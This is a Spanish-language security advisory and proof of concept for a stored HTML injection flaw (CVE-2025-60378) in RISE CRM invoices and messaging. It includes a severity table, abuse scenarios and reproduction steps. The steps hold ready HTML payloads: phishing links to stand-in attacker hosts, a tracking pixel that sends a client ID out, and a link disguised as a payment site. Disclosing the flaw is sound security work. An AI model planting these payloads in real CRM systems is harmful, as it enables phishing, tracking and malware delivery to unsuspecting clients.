
Prueba de concepto para la inyección de HTML almacenada en RISE CRM, que demuestra cómo los usuarios autenticados pueden inyectar HTML malicioso en facturas y mensajes, lo que conduce a phishing y distribución de malware a través de correos electrónicos y PDFs automatizados.
⚠️ Aviso de Seguridad
Una vulnerabilidad crítica de inyección de HTML almacenado que afecta a facturas, mensajería y comunicaciones automatizadas
Se ha descubierto una vulnerabilidad crítica de inyección de HTML almacenado en RISE Ultimate Project Manager & CRM que permite a usuarios autenticados inyectar HTML malicioso en partidas de facturas, notas de clientes y módulos de mensajería. Este contenido inyectado persiste en la base de datos y se renderiza automáticamente en correos electrónicos dirigidos a clientes, PDFs y comunicaciones de chat, lo que permite ataques de phishing a gran escala, compromiso de correo empresarial y entrega de malware mediante correo electrónico/PDF.
| Atributo | Valor |
|---|---|
| ID CVE | CVE-2025-60378 |
| Tipo | Inyección de HTML Almacenado |
| CWE | CWE-79 |
| Vector de Ataque | Red/Remoto |
| Autenticación | Requerida (Privilegios Bajos) |
| Interacción del Usuario | Ninguna |
| Severidad | ALTA |
| CVSS v3.1 | 8.1 - Alta |
| Descubridor | Ajansha Shankar |
RISE CRM no sanea ni codifica adecuadamente el contenido HTML en múltiples campos editables por el usuario, incluyendo facturas, mensajes y notas de clientes. Cuando usuarios autenticados inyectan cargas útiles HTML en estos campos, el contenido se almacena en la base de datos sin un filtrado adecuado. Posteriormente, este HTML malicioso se renderiza automáticamente en correos electrónicos dirigidos a clientes, archivos PDF adjuntos y módulos de mensajería/chat sin el escape adecuado. Las facturas recurrentes y la mensajería automatizada amplifican el ataque al distribuir contenido malicioso a múltiples destinatarios simultáneamente.
| Factor | Impacto | Explicación |
|---|---|---|
| Confidencialidad | 🔴 ALTA | Las credenciales de clientes y datos sensibles pueden ser recolectados mediante phishing |
| Integridad | 🔴 ALTA | El contenido malicioso puede modificar la percepción de las comunicaciones y relaciones comerciales |
| Disponibilidad | 🟡 BAJA | Impacto directo limitado en la disponibilidad del sistema |
Un atacante con acceso de gerente de proyecto de bajos privilegios crea una factura con HTML malicioso:
<a href="https://attacker.com/fake-payment">Haga clic aquí para ver el estado del pago</a>
La factura se envía a más de 100 clientes mediante correo electrónico automatizado. Todos los clientes reciben lo que parece ser una factura legítima que los dirige a un sitio de phishing. El atacante recolecta credenciales de múltiples víctimas simultáneamente.
Un atacante inyecta HTML malicioso en un mensaje de cliente:
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Descargar Archivos de Proyecto Actualizados</a>
Todos los miembros del equipo y clientes reciben el mensaje en su chat, haciendo clic en enlaces para descargar malware.
Un atacante configura una factura recurrente con una carga útil de entrega de malware. Cada mes, los clientes reciben automáticamente facturas con contenido malicioso incrustado, proporcionando un vector de ataque persistente.
Navegar a: Panel de RISE CRM → Facturas/Mensajes → Crear Nuevo
<a href="https://attacker.com">Haga clic aquí para ver la factura</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visite Nuestro Nuevo Sitio Web</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ El HTML inyectado se renderiza en correos electrónicos, PDFs y mensajería sin escape ✅ Los enlaces son clicables y redirigen a sitios del atacante ✅ Las imágenes se cargan desde servidores controlados por el atacante ✅ El contenido persiste en todas las comunicaciones futuras con clientes ✅ La distribución recurrente llega a múltiples destinatarios automáticamente